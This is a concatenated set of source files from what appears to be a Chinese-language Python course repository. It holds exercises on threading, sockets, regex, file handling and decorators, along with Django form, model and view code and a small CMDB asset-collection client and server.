url(r'^login/$', views.login), ] <file_sep>/day9/线程/守护线程.py from threading import Thread import time def foo(): while 1: print(123) time.sleep(1) def bar(): print(456) time.sleep(5) print('end456') t1=Thread(target=foo) t2=Thread(target=bar) t1.daemon=True #t1是守护线程,t2是主线程 t1.start() t2.start() print('#####') #主线程 # 主线程结束了之后守护线程也同时结束 # 守护线程会等待主线程完全结束之后才结束 #递归锁(Rlock) from threading import RLock lock = RLock() lock.acquire() lock.acquire() print(123) lock.release() print(456) lock.release()<file_sep>/day8/解决粘包/server.py import socket import struct sk=socket.socket() sk.bind(('127.0.0.1',8090)) sk.listen() conn,addr=sk.accept() inp=input('>>>:').encode('utf-8') inp_len=len(inp)#计算用户输入的长度 bytes_msg=struct.pack('i',inp_len)#将数字转换成固定的bytes conn.send(bytes_msg) #先发送报头的长度4个bytes conn.send(inp)#在发送报头的字节格式 conn.send(b'alex sb')#最后发送真实内容的字节格式 conn.close() sk.close() <file_sep>/auto_client/src/script.py from conf import settings from src.client import AgentClient from src.client import SaltSshClient def 
start(): if settings.MODE == 'AGENT': obj = AgentClient() elif settings.MODE == 'SSH' or settings.MODE == 'SALT': obj = SaltSshClient() else: raise Exception("仅支持agent,ssh,salt") obj.exec() <file_sep>/day26/selenium自动化操作/1 自动化.py from selenium import webdriver import time # 创建一个浏览器 bro = webdriver.Chrome(executable_path=r'./chromedriver_win32/chromedriver.exe') # 取得程序的路径 # 打开浏览器 url = 'https://www.baidu.com' # 发送请求 bro.get(url=url) time.sleep(3) # 调用seleniem提供的接口 # 找到指定的搜索框 myInput = bro.find_element_by_id("kw") # 在对应搜索框录入指定的词条 myInput.send_keys('美女') time.sleep(2) # 点击搜索,定位到搜索按钮 myButton = bro.find_element_by_id('su') myButton.click() # 点击按钮 time.sleep(2) # myButton2=bro.find_elements_by_xpath('//*[@id="3"]/h3/a')[0].click() # 关闭浏览器 bro.quit() <file_sep>/day21/CMS/fault_reporting/forms.py from django import forms from django.core.validators import RegexValidator from django.core.exceptions import ValidationError from fault_reporting import models import re # 1. 正则的校验规则 # 2. 自定义函数 def check_email(value): # <EMAIL> ret = re.match(r'^[a-zA-Z0-9_.-]+@[a-zA-Z0-9-]+(\.[a-zA-Z0-9-]+)*\.[a-zA-Z0-9]{2,6}$', value) if not ret: # 邮箱格式匹配不上 raise ValidationError("邮箱格式不正确") else: return value # 注册的form类 class RegisterForm(forms.Form): username = forms.CharField(min_length=2, label="用户名") password = forms.CharField( label="密码", min_length=6, widget=forms.widgets.PasswordInput() ) re_password = forms.CharField( label="确认密码", min_length=6, widget=forms.widgets.PasswordInput(attrs={"class": "form-control"}) ) phone = forms.CharField( label="手机号", min_length=11, max_length=11, validators=[RegexValidator(r'^1[3-9]\d{9}$', "手机号码格式不正确")], ) email = forms.CharField( label="邮箱", validators=[check_email, ] ) # 局部钩子 def clean_username(self): # 做用户名不能重复的校验 username = self.cleaned_data.get("username") #获取用户名 # 去数据库查重 is_exist = models.UserInfo.objects.filter(username=username) if is_exist: # 用户名已经被注册 raise ValidationError("用户名已被注册") else: return username # 全局钩子,用来多多字段的比较 def clean(self): pwd 
= self.cleaned_data.get("password") re_pwd = self.cleaned_data.get("re_password") if re_pwd != pwd: # 两次填写的密码不一致 self.add_error("re_password", "两次密码不一致") raise ValidationError("两次密码不一致") else: return self.cleaned_data # 重写init def __init__(self, *args, **kwargs): super(RegisterForm, self).__init__(*args, **kwargs) # 循环给每个字段加 class: form-control for field in iter(self.fields): self.fields[field].widget.attrs.update({ 'class': 'form-control' }) <file_sep>/复习/数据类型.py #切片 # s = 'python自动化21期' # s1=s[1:3] # print(s[1:6:2]) # print(s[0:]) # # 打印到最后但是不包括最后一个 # print(s[:-1]) # print(s[6:0:-2]) #capitalize大小写 s2='hu' # s1=s2.capitalize() # print(s1) # print(s2.upper()) # print(s2.lower()) # print(s2.swapcase()) #title # ss = '<NAME>*oldboy3taibiahu' # print(ss.title()) # # print(s2.center(30,'*')) #**************hu************** #strip # s = 'tyoyldBoyrte' # s1='hkdjkltkjkedfdty' # print(s) # print(s.strip()) # print(s1.strip('tey')) # # name=input('>>>').strip() # if name == 'hu': # print('登录成功') # split 以什么分割,最终形成一个列表此列表不含有这个分割的元素 # b = 'oldboywusiroalex' # l = b.split() # 字符串变成列表 # print(l) # s1 = 'oldboy,wusir,alex' # print(s1.split(','))# 字符串变成列表 # # l3 = b.split('o',3)#以o分割,最终形成3个列表 # print(l3) #join # sa = 'oldBoy' # s9 = '+'.join(sa) ##用‘+’号把字符串连接起来 # print(s9) # # l1 = ['oldboy','wusir','alex'] # s91=','.join(l1) # print(s91) #find 通过元素找索引 找不到返回-1,找到返回1 u = 'odlabced' u1 = u.find('d') print(u1) #字符串格式化输出format # res='我叫{},今年{},爱好{}'.format('egon','18','女') # print(res) # # res1='我叫{0}今年{1}岁,爱好{2},我依然叫{0}'.format('egon',18,'male') # print(res1) # # res3='{name} {age} {sex}'.format(sex='male', name='egon', age=18) # print(res3) #list # l = ['老男孩', 'alex', 'wusir', 'taibai', 'ritian'] # l.extend('hu') # print(l) # print(l.pop(0)) # l.remove('alex') # print(l) # print(l[2]) # l[2]='huningfei' # print(l) #元组 tu=(11,2,True,[2,3,4],'alex') # for i in tu: # print(i) # print (tu[:3:2]) # print(tu.index(True)) # tu[-2].append('99') # print(tu) #字典 # dic = {'name': 'taibai', 
'age': 21, 'hobby': 'girl', } # dic['high']=190 # print(dic) # dic.setdefault('high',180) # print(dic) # print(dic.pop('name')) # print (dic.pop('name1','没有辞职,sb')) # dic2 = {'name':'alex','weight':75} # dic2.update(dic) #将dic所有的键值对覆盖添加(相同的覆盖,没有的添加)到dic2中 # print(dic) # print(dic2) #查 # print(dic.get('name')) # print (dic.get('name1','没有此键值')) # # print (list(dic.keys()))#取出键值 # for i in dic.keys(): # print(i) # # print(list(dic.values()))#取出value # print(list(dic.items()))#同事取出键值和value # print(len(dic)) dic = {'k1':'v1','k2':'v2','k3':'v3','r':666} l1 = [] # for i in dic: # if 'k' in i: # l1.append(i) # print(l1) # # for i in l1: # del dic[i] # print(dic) <file_sep>/day20/CMS/fault_reporting/urls.py from django.conf.urls import url from fault_reporting import views urlpatterns = [ # 第一版, 特别low版 # url('^lob/(.*)/$', views.lob), # url('^tag/(.*)/$', views.tag), # url('^archive/(.*)/$', views.archive), # # # 第二版: 三合一 # url(r'(lob|tag|archive)/(.*)/$', views.sanhe1), # sanhe1(request, *args) args[0]=="lob" # 第三版: 四合一 url(r'(lob|tag|archive)/(.*)/$', views.index), # index(request, "lob", "游戏") url('^$', views.index), # index(request) ]<file_sep>/day5/正则.py # \w{2,}? 
##匹配两次,问号是惰性匹配 # \w{2,} #匹配两次或更多次 # \w{2,3} ##匹配两次到三次因为是贪婪匹配,所以默认匹配三次 # https://www.cnblogs.com/Wxtrkbc/p/5453349.html # https://www.cnblogs.com/wushank/p/5172792.html # import re # expression='(( 100 + 40 )*5/2- 3*2* 2/4+9)*((( 3 + 4)-4)-4)' # l=re.findall('([\d\.]+|/|-|\+|\*)',expression) # print(l) import re expression= '100.5+40*5/2-3*2*2/4+9' l = re.findall('([\d\.]+|/|-|\+|\*)',expression) #print(100.5+40*5/2-3*2*2/4+9) # 206.5 def multdiv(l,x): #定义最小的乘除运算单元,l是列表,x代表*或/ a = l.index(x) #首先获取乘除运算符的位置 if x=='*': #如果是*则执行乘法运算 k = float(l[a - 1]) * float(l[a + 1]) #获取乘法运算的结果,比如k=3*2 else: k = float(l[a - 1]) / float(l[a + 1]) del l[a - 1], l[a - 1], l[a - 1] #删除掉列表里刚做运算的三个元素,比如,3 * 2 l.insert(a - 1, str(k)) #将刚计算的结果插入到列表中然后执行下一次计算 print(l) <file_sep>/deploy/web/forms/host.py from django.forms import ModelForm from web.forms.base import BootStrapModelForm from web import models class HostModelForm(BootStrapModelForm): class Meta: model = models.Host fields = "__all__"<file_sep>/day21/CMS/fault_reporting/apps.py from django.apps import AppConfig class FaultReportingConfig(AppConfig): name = 'fault_reporting' <file_sep>/day4/作业备份.py ##转换数据 TITLE=['id','name','age','phone','job'] with open('userinfo',encoding='utf-8',mode='r') as f1: dic = {} for i in TITLE: dic[i] = [] #print(dic) for line in f1: pid,name,age,phone,job = line.split(",") dic['id'].append(pid) dic['name'].append(name) dic['age'].append(age) dic['phone'].append(phone) dic['job'].append(job) #print(dic) def gt(a,b): match_list =[] for index,val in enumerate(dic[a]): ##age[22,23,]并求出age的各个索引 if int(val) > int(b): ##匹配上了 # print("match",val) onwer_list=[] for col in TITLE: onwer_list.append(dic[col][index]) match_list.append(onwer_list) #print("查询到的数据:",match_list) return match_list ''' :param a: age :param b: 22 :return: ''' def lt(a,b): match_list = [] for index, val in enumerate(dic[a]): ##age[22,23,]并求出age的各个索引 if int(val) < int(b): ##匹配上了 # print("match",val) onwer_list = [] for col in TITLE: 
onwer_list.append(dic[col][index]) match_list.append(onwer_list) # print("查询到的数据:",match_list) return match_list def eq(a,b): match_list = [] for index, val in enumerate(dic[a]): ##age[22,23,]并求出age的各个索引 if val == b: ##匹配上了 # print("match",val) onwer_list = [] for col in TITLE: onwer_list.append(dic[col][index]) match_list.append(onwer_list) # print("查询到的数据:",match_list) return match_list def op_like(a,b): match_list = [] for index, val in enumerate(dic[a]): ##age[22,23,]并求出age的各个索引 if b in val: ##匹配上了 # print("match",val) onwer_list = [] for col in TITLE: onwer_list.append(dic[col][index]) match_list.append(onwer_list) # print("查询到的数据:",match_list) return match_list def check_where(right_yuju): tiaojian = { '>':gt, '<':lt, '=':eq, 'like':op_like, } for fu_hao,value in tiaojian.items(): #print(value) if fu_hao in right_yuju: a,b = right_yuju.split(fu_hao)#a和b接受到了age和22 matched_data = value(a.strip(),b.strip()) #print(matched_data) return matched_data else: print('where语法错误') ''' 解析where条件,判断大于,小于,等于和like :return: age>22 ''' def select(match_data,left_yuju): """ ##这个只是可以查看name和age的语句 :param match_data:[['2', 'Egon', '23', '13304320533', 'Tearcher\n'], ['3', 'nezha', '25', '1333235322', 'IT']] :param left_yuju: select name, age from userinfo :return: """ filter_cols_tmp = left_yuju.split('from')[0].split()[1:] #取出name,和age 例:[' name', ' age '] filter_cols = [i.strip().strip(",") for i in filter_cols_tmp] ##取出干净的name和age #print(filter_cols) reformat_data_set = []##最终要打印的数据 for row in match_data: ##row是['3', 'nezha', '25', '1333235322', 'IT'] #print(row) filtered_vals=[] ##['Egon', '23'] ['nezha', '25'] for col in filter_cols: ##col是name和age col_index = TITLE.index(col) ##name和age在title里面的索引1和2的位置 filtered_vals.append(row[col_index])#['3', 'nezha', '25', '1333235322', 'IT'][1] reformat_data_set.append(filtered_vals) print(reformat_data_set) def check_input(cmd): ## 检测输入的语句,并分割成两个语句(cmd是从用户输入的命令传过来的) """ :param cmd: select name, age where age>22 :return: """ 
syntax_list={ 'select':select, 'update':update, 'add':insert, 'delete':delete } if cmd.split()[0] in ('select','update','delete','insert'):#取出用户输入的第一个命令 left_yuju,right_yuju = cmd.split('where')#以where关键字分割语句 matched_data=check_where(right_yuju)#把where后面的语句传送给了check_where syntax_list[cmd.split()[0]](matched_data,left_yuju) else: print("语法错误") def where(): pass def insert(): pass def update(): pass def delete(): pass ##输入语句 def yuju(): while True: cmd = input("mysql>>:").strip() if not cmd: continue check_input(cmd) ##传给检测你输入语句的函数 yuju()<file_sep>/模板/auto - 2 - 固定二级菜单示例/auto - 2 - 固定二级菜单示例/web/models.py from django.db import models # Create your models here. class User(models.Model): ''' 用户表 ''' name = models.CharField(verbose_name='姓名', max_length=32) class Order(models.Model): ''' 订单表 ''' name = models.CharField(verbose_name='名字', max_length=32) <file_sep>/day17/lianxi/app01/models.py from django.db import models # Create your models here. # 建表出版社 class Publisher(models.Model): name = models.CharField(max_length=22) # 书籍表关联出版社 class Book(models.Model): title = models.CharField(max_length=32) publisher = models.ForeignKey(to="Publisher", on_delete=models.CASCADE) # 人员表 class Person(models.Model): name = models.CharField(max_length=22) age = models.IntegerField() birthday = models.DateField() birthday2 = models.DateTimeField(null=True) phone = models.CharField(max_length=11, unique=True) # 创建该记录时自动把当前时间保存到该字段 join_date = models.DateField(auto_now_add=True) # 更新该记录的值时 自动把当前时间保存到该字段 last_date = models.DateField(auto_now=True) def __str__(self): return "{}-{}".format(self.name, self.age, self.phone) <file_sep>/day18/练习/app01/models.py from django.db import models # Create your models here. 
class Publisher(models.Model): name = models.CharField(max_length=20) class Book(models.Model): title = models.CharField(max_length=20) publisher = models.ForeignKey(to="Publisher") class Author(models.Model): name = models.CharField(max_length=20) books = models.ManyToManyField(to="Book", related_name="authors") class Userinfo(models.Model): name=models.CharField(max_length=20)<file_sep>/day19/form/app01/views.py from django.shortcuts import render,redirect from app01 import models from app01.forms import BookForm import datetime # Create your views here. def book_list(request): print(request.user.username,type(request.user)) data=models.Book.objects.all() return render(request,"book_list.html",locals()) def add_book(request): form_obj=BookForm() if request.method=="POST": form_obj=BookForm(request.POST) if form_obj.is_valid(): #做数据有效性校验 # 因为有多对多的字段,所以需要额外处理 authors=form_obj.cleaned_data.pop("authors") # 创建新书籍对象 book_obj=models.Book.objects.create(**form_obj.cleaned_data) # 讲书籍对象和作者建立关联 book_obj.authors.add(*authors) return redirect("/book_list/") return render(request,"add_book.html",locals()) def edit_book(request,pk): book_obj=models.Book.objects.filter(id=pk).first() from django.forms import model_to_dict book_dict=model_to_dict(book_obj) book_dict["publisher_date"]=book_obj.publisher_date.strftime("%Y-%m-%d") form_obj=BookForm(book_dict) if request.method=="POST": form_obj=BookForm(request.POST) if form_obj.is_valid(): book_obj.title=form_obj.cleaned_data.get("title") book_obj.publisher_id=form_obj.cleaned_data.get("publisher_date") book_obj.publisher_id=form_obj.cleaned_data.get("publisher") book_obj.save() book_obj.authors.set(form_obj.cleaned_data.get("authors")) return redirect("/book_list") return render(request,"edit_book.html",locals()) def del_book(request,pk): models.Book.objects.filter(id=pk).delete() return redirect("/book_list") <file_sep>/deploy/web/forms/deploy.py from django import forms from web.forms.base import BootStrapModelForm from web 
import models class DeployModelForm(BootStrapModelForm): class Meta: model = models.Deploy fields = ['version','script'] class DeployPushForm(forms.Form): hosts = forms.MultipleChoiceField( label='选择主机', choices=[(1,'1.1.1.1'),(2,'1.1.1.2')], widget=forms.CheckboxSelectMultiple() ) def __init__(self,project_object, *args,**kwargs): super(DeployPushForm,self).__init__(*args,**kwargs) self.fields['hosts'].choices = project_object.hosts.all().values_list('id','hostname')<file_sep>/auto_server/api/plugins/__init__.py from django.conf import settings from repository import models import importlib from .server import Server class PluginManger(object): def __init__(self): self.plugin_items = settings.PLUGIN_ITEMS self.basic_key = "basic" self.board_key = "board" def exec(self,server_dict): ''' :param server_dict: 客户端发送过来的数据 :return:1,执行完全成功; 2, 局部失败;3,执行失败;4. 服务器不存在 ''' ret = {'code': 1, 'msg': None} hostname = server_dict[self.basic_key]['data']['hostname'] server_obj = models.Server.objects.filter(hostname=hostname).first() if not server_obj: # 如果没有这个主机,则返回ret,并不是去数据库直接创建主机了,你需要先去后台创建主机名才可以 ret['code'] = 4 return ret # 更新操作 obj = Server(server_obj, server_dict[self.basic_key], server_dict[self.board_key]) # 执行server里面的函数,生成obj对象 obj.process() # 对比更新[硬盘,网卡,内存,可插拔的插件] for k, v in self.plugin_items.items(): # 去循环setting里面的配置的硬盘,内存信息 # "nic": "api.plugins.nic.Nic", try: module_path, cls_name = v.rsplit('.', maxsplit=1) md = importlib.import_module(module_path) cls = getattr(md, cls_name) # cls是指disk,nic,memory等插件 obj = cls(server_obj, server_dict[k]) # server_obj是主机名,server_dict[k]是指硬盘或者内存的数据 # print(obj) obj.process() except Exception as e: ret['code'] = 2 return ret <file_sep>/day4/匿名函数.py # lambda表达式 # def add(a,b): # return a+b # add = lambda a,b : a+b # print(add(1,2)) # [i**2 for i in range(10)] # def func(num): # return num ** 2 # # # for i in map(func,range(10)):print(i) # for i in map(lambda num : num ** 2 ,range(10)):print(i) # def func(num): # return num%2 # 
print(min(-2,3,-4,key=func)) # print(min(-2,3,-4,key=lambda num:num%2)) # d = lambda p:p*2 # t = lambda p:p*3 # x = 2 # x = d(x) # x = 4 # x = t(x) # x = 12 # x = d(x) # print(x) # 现有两元组(('a'),('b')),(('c'),('d')),请使用python中匿名函数生成列表[{'a':'c'},{'b':'d'}] # def func(t): # return {t[0]:t[1]} # ret = map(func,zip((('a'),('b')),(('c'),('d')))) # print(list(ret)) # ret = map(lambda t:{t[0]:t[1]},zip((('a'),('b')),(('c'),('d')))) # print(list(ret)) # 3.以下代码的输出是什么?请给出答案并解释。 def multipliers(): return [lambda x: i * x for i in range(4)] print([m(2) for m in multipliers()]) # def multipliers(): # lst = [] # i = 0 # lst.append(lambda x:i*x) # i = 1 # lst.append(lambda x:i*x) # i = 2 # lst.append(lambda x:i*x) # i = 3 # lst.append(lambda x:i*x) # # lst = [lambda x:3*2,lambda x:i*x,lambda x:i*x,lambda x:i*x] # return lst # print([m(2) for m in multipliers()]) # def multipliers(): # return (lambda x:i*x for i in range(4)) g = (lambda x: i * x for i in range(4)) # print([m(2) for m in g]) # 请修改multipliers的定义来产生期望的结果。<file_sep>/cmdb/auto_client - 7 - 资产信息入库/相关脚本/run.py #!/usr/bin/python # -*- coding:utf-8 -*- import requests import json def agent(): """ 获取当前服务器的资产信息并提交给api :return: """ # 1. 获取资产信息:硬盘、网卡、内存...(linux或win的判断) import subprocess disk = subprocess.getoutput('dir') info = {'hostname':'c1','memory':disk} # 2. 日志处理(堆栈信息) # 3. 唯一标记问题 # 如果只是物理机:sn做唯一标记 # 物理+虚拟机:1. 系统+调用openstack api ;2.主机名做唯一标记 url = "http://127.0.0.1:8000/api/asset/" r1 = requests.post( url=url, data=json.dumps(info).encode('utf-8'), # data={'k1':'v1','k2':'v2'} # hostname=c1&memory=xxxxx ) print(r1.text) def task(host): # 每一台主机,调用ssh或salt接口远程连接上主机并执行命令 获取结果。(线程池的方式进行采集) info = {'hostname': host, 'disk': '....'} # 通过requests发送POST请求将资产数据提交到api url = "http://127.0.0.1:8000/api/asset/" r1 = requests.post( url=url, data=json.dumps(info).encode('utf-8'), ) print(r1.text) def ssh(): # 1. 
获取未采集服务器列表 r1 = requests.get(url="http://127.0.0.1:8000/api/asset/") # print(r1.content, r1.text, r1.json() ) host_list = r1.json() from concurrent.futures import ThreadPoolExecutor pool = ThreadPoolExecutor(10) for host in host_list: pool.submit(task,host) ssh()<file_sep>/day4/1.复习.py # 文件操作 # 打开文件 # f = open('文件路径') 默认的打开方式r ,默认的打开编码是操作系统的默认编码 # r w a (r+ w+ a+) 以上6种加b ,如果打开模式+b,就不需要指定编码了 # 编码 UTF-8 ,gbk # 操作文件 # 读 # read 不传参数 意味着读所有 # 传参,如果是r方式打开的,参数指的是读多少个字符 # 传参,如果是rb方式打开的,参数指的是读多少个字节 # readline # 一行一行读 每次只读一行,不会自动停止 # for循环的方式 # 一行一行读 从第一行开始 每次读一行 读到没有之后就停止 # 写 # write 写内容 # 关闭文件 # f.close() # with open() as f: # 修改文件 : # import os # os.remove # os.rename # 函数 # 定义 # 关键字 def 函数名(形参): # 参数 : # 位置参数 # *args 动态传参 :接收在调用的时候传过来的多余的所有按位置传的参数 # 关键字参数 默认参数,如果不传会有一个默认的值,如果传了会覆盖默认的值 # **kwargs 动态传参 :接收在调用的时候传过来的多余的所有按关键字传的参数 # 返回值 # return 停止一个程序的运行,返回参数 # 没有返回值 默认返回None # 有一个返回值 # 返回多个值 # 调用 # 调用的关键字 函数名(实参) # 传参数 : # 按照位置传 # 按照关键字传 # 接收返回值 # 没有返回值 不接受 # 有一个返回值 用一个变量接收 # 有多个返回值 # 用一个变量接收 所用返回值都会被组织成一个元组 # 用多个变量接收 有多少个返回值 就必须用多少个变量接收 # 函数是第一类对象的概念 # 函数名 --> 函数的内存地址 # 函数名可以作为 容器类型的元素 函数的参数、返回值 还能进行赋值 --> 变量 # 闭包和装饰器 # 闭包的定义 : 内部函数引用外部函数的变量 # 闭包的应用 :装饰器<file_sep>/day3/练习.py # 1. 文件a.txt内容:每一行内容分别为商品名字,价钱,个数。 # apple 10 3 # tesla 100000 1 # mac 3000 2 # lenovo 30000 3 # chicken 10 3 # 通过代码,将其构建成这种数据类型:[{'name':'apple','price':10,'amount':3},{'name':'tesla','price':1000000,'amount':1}......] 
并计算出总价钱。 #new_list=[] # total = 0 # with open('article',encoding='utf-8') as f1: # for i in f1: # a=(i.split()) # # print(a) # new_list.append({'name':a[0],'price':a[1],'amount':a[2]}) # print(new_list) # f1.close() # for g in new_list: # money = g['price'] # count = g['amount'] # total = total + int(money) * int(count) # print(total) ##第二种写法,别人的 # product = [] # file = open("article") # flag = True # total = 0 # while flag: # line = file.readline().strip() # if not line: # flag = False # break # temp = line.split() # p = {"name": '', 'price': 0, 'amount': 0} # p['name'] = temp[0] # p['price'] = int(temp[1]) # p['amount'] = int(temp[2]) # total = total + p.get('price') * p.get('amount') # product.append(p) # # file.close() # print(product) # print(total) # 2,有如下文件: # ------- # alex是老男孩python发起人,创建人。 # alex其实是人妖。 # 谁说alex是sb? # 你们真逗,alex再牛逼,也掩饰不住资深屌丝的气质。 # ---------- # 将文件中所有的alex都替换成大写的SB。 # import os # with open('2.txt',encoding='utf-8') as f1,\ # open('2.txt.bak',encoding='utf-8',mode='w') as f2: # for line in f1: # new_line = line.replace('alex','SB') # f2.write(new_line) # os.remove('2.txt') # os.rename('2.txt.bak','2.txt') # 2、写函数,检查获取传入列表或元组对象的所有奇数位索引对应的元素,并将其作为新列表返回给调用者。 # new_list=[] # jishu = [] # def func1(*args): # return 111,22,3,4,5,7,87 # ret = func1() # new_list.extend(ret) # #print(new_list[0]) # for i in range(len(new_list)): # if i%2 != 0: # jishu.append(new_list[i]) # else: # pass # print(jishu) # ret1=[] # with open('2.txt',encoding='utf-8') as f1: # li = f1.readline().split() # print(li) # for i in f1: # dic = {} # #print(i) # for j in range(len(li)): # dic[li[j]] = i.split()[j] # ret1.append(dic) # print(ret1) ##推导式 # list = [] # with open('2.txt',encoding='utf-8') as f1: # keys = [i for i in f1.readline().split()] # #print(keys) # for volumes in f1: # print(volumes) # list.append({k:v for k,v in zip(keys,volumes.split())}) # print(list) ##注册 # user_status = { # 'username': None, # 'status': False # } # def register(): # flag = True # while 
True: # with open('register', encoding='utf-8', mode='r') as f1,\ # open('register', encoding='utf-8', mode='a') as f2: # username = input("请输入你要注册的用户名:") # for i in f1: # if username in i: # print("用户名已经存在,请更改") # break # else: # while flag: # one_passwd = input("请输入你的密码:") # two_passwd = input("请再次输入你的密码:") # if one_passwd != two_passwd: # print("你的密码不一致,请重新输入") # continue # else: # f2.write('%s %s\n' % (username, two_passwd)) # user_status['status'] = True # if user_status.get('status'): # print("你已经注册并登陆成功") # flag = False # # break # f1.close() # f2.close() # register() # ##登录 # # # def login(): # print('注意,超过三次锁定用户') # b = 0 # while b < 3: # username = input("请输入你的用户名:") # password = input("请输入你的密码:") # with open('register',encoding='utf-8')as f1: # for i in f1: # a = (i.split()) # if a[0] == username and a[1] == password: # user_status['status'] = True # print(user_status.get('status')) # print("登录成功") # exit() # else: # print("登录失败,请重新登录,你已经用了%s次" % (b+1)) # b += 1 # login() ##装饰 # def wrapper(f1): # def inner(*args,**kwargs): # if user_status.get('status') ##如果登录成功,则正常访问 # ret = f1(*args,**kwargs) # return ret # else: # login() # return f1 # wrapper() def inner(): with open('article',encoding='utf-8') as f1: wen = f1.read() return wen print(type(inner)) print(type(str(inner))) if logout() in inner: exit() <file_sep>/day15/作业/conf/setting.py host = "127.0.0.1" port = 3306 database = "user" user = "root" password = "123" charset = "utf8" logdir = "../logs/info.log" <file_sep>/day3/博客园作业.py ##博客地址:http://www.cnblogs.com/huningfei/p/8849749.html 文件 ##http://www.cnblogs.com/huningfei/p/8849968.html 函数 ##存贮用户登录状态的 user_status = { 'username': None, 'status': False } ##登录函数 def wrapper(f2): def inner(): func1 = str(inner) func2 = str(quit) if func2 in func1: exit() if user_status.get('status'): f2() ##就是被装饰的函数 else: print('\033[1;33m注意,请先登录,在操作,超过三次锁定用户\033[0m') b = 0 while b < 3: username = input("\033[1;33m请输入你的用户名:\033[0m") password = 
input("\033[1;33m请输入你的密码:\033[0m") with open('register',encoding='utf-8')as f1: for i in f1: a = (i.split()) if a[0] == username and a[1] == password: user_status['status'] = True print("\033[1;33m登录成功\033[0m") return username else: print("登录失败,请重新登录,你已经用了%s次" % (b+1)) b += 1 return inner @wrapper def login(): ##这里重新定义一个login函数,因为你如果直接执行装饰器会报错,因为里面传了一个参数 pass def register(): ##注册 flag = True while True: with open('register', encoding='utf-8', mode='r') as f1,\ open('register', encoding='utf-8', mode='a') as f2: username = input("请输入你要注册的用户名:").strip() if not username.isalnum() or not username.isdigit(): pass else: print("用户名不能只有数字,请更改") continue for i in f1: if username in i: print("用户名已经存在,请更改") break else: while flag: one_passwd = input("请输入你的密码:").strip() two_passwd = input("请再次输入你的密码:").strip() if one_passwd != two_passwd: print("你的密码不一致,请重新输入") continue else: f2.write('%s %s\n' % (username, two_passwd)) user_status['status'] = True flag = False break f1.close() f2.close() @wrapper # article = login(article) def article(): with open('article',encoding='utf-8') as f1: print(f1.read()) @wrapper def diary(): print('\033[1;33m-----欢迎来到日记页面-----\033[0m') @wrapper def comment(): print('\033[1;33m-----欢迎来到评论页面------\033[0m') @wrapper def collection(): print('\033[1;33m------欢迎来到收藏页面------\033[0m') @wrapper def logout(): user_status['status'] = False print("\033[1;33m你已经退出\033[0m'") @wrapper def quit(): print("你已退出整个程序") exit() dic = {1:login, 2:register, 3:article, 4:diary, 5:comment, 6:collection, 7:logout, 8:quit } ##输出提示内容 while True: with open('zuoye',encoding='utf-8') as f1: print(f1.read()) num= int(input("请选择一个序号操作:").strip()) dic.get(num)() <file_sep>/deploy/web/forms/base.py from django import forms class BootStrapModelForm(forms.ModelForm): def __init__(self,*args,**kwargs): super(BootStrapModelForm,self).__init__(*args,**kwargs) # 循环找到form中所有的字段,为每个字段你添加一个样式 for k,v in self.fields.items(): v.widget.attrs['class'] = 'form-control' <file_sep>/cmdb/auto_client 
- 7 - 资产信息入库/lib/module_string.py #!/usr/bin/python # -*- coding:utf-8 -*- import importlib def import_string(path): """ 根据字符串的形式去导入路径中的对象 :param path: 'src.engine.agent.AgentHandler' :return: """ module_path,cls_name = path.rsplit('.',maxsplit=1) module = importlib.import_module(module_path) return getattr(module,cls_name)<file_sep>/cmdb/auto_client - 7 - 资产信息入库/src/plugins/basic.py #!/usr/bin/env python # -*- coding:utf-8 -*- import traceback from .base import BasePlugin from lib.response import BaseResponse from lib.log import logger class Basic(BasePlugin): def os_platform(self,handler, hostname): """ 获取系统平台 :return: """ output = handler.cmd('uname',hostname) return output.strip() def os_version(self,handler, hostname): """ 获取系统版本 :return: """ output = handler.cmd('cat /etc/issue',hostname) result = output.strip().split('\n')[0] return result def os_hostname(self,handler, hostname): """ 获取主机名 :return: """ output = handler.cmd('hostname',hostname) return output.strip() def win(self, handler, hostname): raise NotImplementedError('win must be implemented ') def linux(self, handler, hostname): response = BaseResponse() try: if self.debug: ret = { 'os_platform':'linux', 'os_version':'6.5', 'hostname':'c1.com' } else: ret = { 'os_platform': self.os_platform(handler, hostname), 'os_version': self.os_version(handler, hostname), 'hostname': self.os_hostname(handler, hostname), } response.data = ret except Exception as e: msg = traceback.format_exc() response.status = False response.error = msg logger.error(msg) return response.dict <file_sep>/day4/递归函数.py # def func(): # print(1) # func() # # func() # 997 /998 # import sys # def foo(n): # print(n) # n += 1 # foo(n) # foo(1) # 6! 
# print(6*5*4*3*2*1) def fn(n): if n == 1: return 1 return n * fn(n - 1) print(fn(6)) # 递归 就是自己调用自己 # 递归需要有一个停止的条件 # def fn(6): # if 6 == 1:return 1 # return 6*fn(5) # print(fn(6)) # # def fn(5): # return 5*fn(4) # # def fn(4): # return 4*fn(3) # # def fn(3): # return 3*fn(2) # # def fn(2): # return 2*fn(1) # # def fn(1): # return 1<file_sep>/day23/auto - 2 - 固定二级菜单示例/web/templatetags/ooxx.py from django.template import Library from django.conf import settings import copy import re register = Library() # 定义一个函数 # @register.simple_tag() # def show_menu(a): # return '999' @register.inclusion_tag('menu.html') def get_menu(request): ''' 获取菜单 :param request: :return: ''' new_menu_list = copy.deepcopy(settings.MENU_LIST) flag = False for item in new_menu_list: # item就是menu_list里面的一级菜单 for child in item['children']: # 循环children里面的菜单 [个人中心,添加用户,....] reg="^{0}$".format(child['url']) # ^/web/user/1/$ if re.match(reg,request.path_info): #如果请求的菜单和正则匹配 if child['is_menu']: # 如果是true child['class'] = 'active' # 子类class ,如果匹配上就让目录的class=active else: index=child['parent_index'] # 关联菜单,找出要选中菜单的索引 item['children'][index]['class']='active' # 找到这个菜单的索引,然后选中及加上active item['class'] = '' # 父 类class 就是hide flag = True break if flag: break return {'menu_list': new_menu_list} # 把new_menu_list传给menu里面的代码 <file_sep>/day4/优秀的作业/优秀的作业/胡宁飞/员工信息表作业/作业.py ##博客 http://www.cnblogs.com/huningfei/p/8931518.html ## http://www.cnblogs.com/huningfei/p/8920759.html import os from tabulate import tabulate#安装打印模块的表格 ##打印支持的语句 with open('sentence',encoding='utf-8',mode='r')as f1: print('\033[1;33m目前支持的语句有: \n %s\033[0m' % f1.read()) TITLE=['id','name','age','phone','job'] def zhuanhan():##转换数据 with open('userinfo',encoding='utf-8',mode='r') as f1: dic = {} for i in TITLE: dic[i] = [] #print(dic) for line in f1: pid,name,age,phone,job = line.split(",") dic['id'].append(pid) dic['name'].append(name) dic['age'].append(age) dic['phone'].append(phone) dic['job'].append(job) return dic def gt(a,b): ''' :param a: 
